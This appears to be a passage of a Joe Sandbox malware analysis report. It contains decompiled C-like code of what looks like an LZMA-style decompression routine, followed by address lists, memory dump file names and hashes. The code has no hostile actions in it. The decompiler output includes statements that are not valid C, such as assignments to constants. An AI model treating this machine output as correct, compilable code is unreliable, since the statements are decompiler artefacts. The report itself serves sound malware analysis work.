											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407234
0x00407234
0x00407238
0x0040725d
0x00407267
0x00000000
0x0040723a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407247
0x0040724b
0x0040724b
0x0040724e
0x00407328
0x00407328
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00000000
0x00407321
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00000000
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x004073c3
0x00000000
0x00407238

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F4A() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
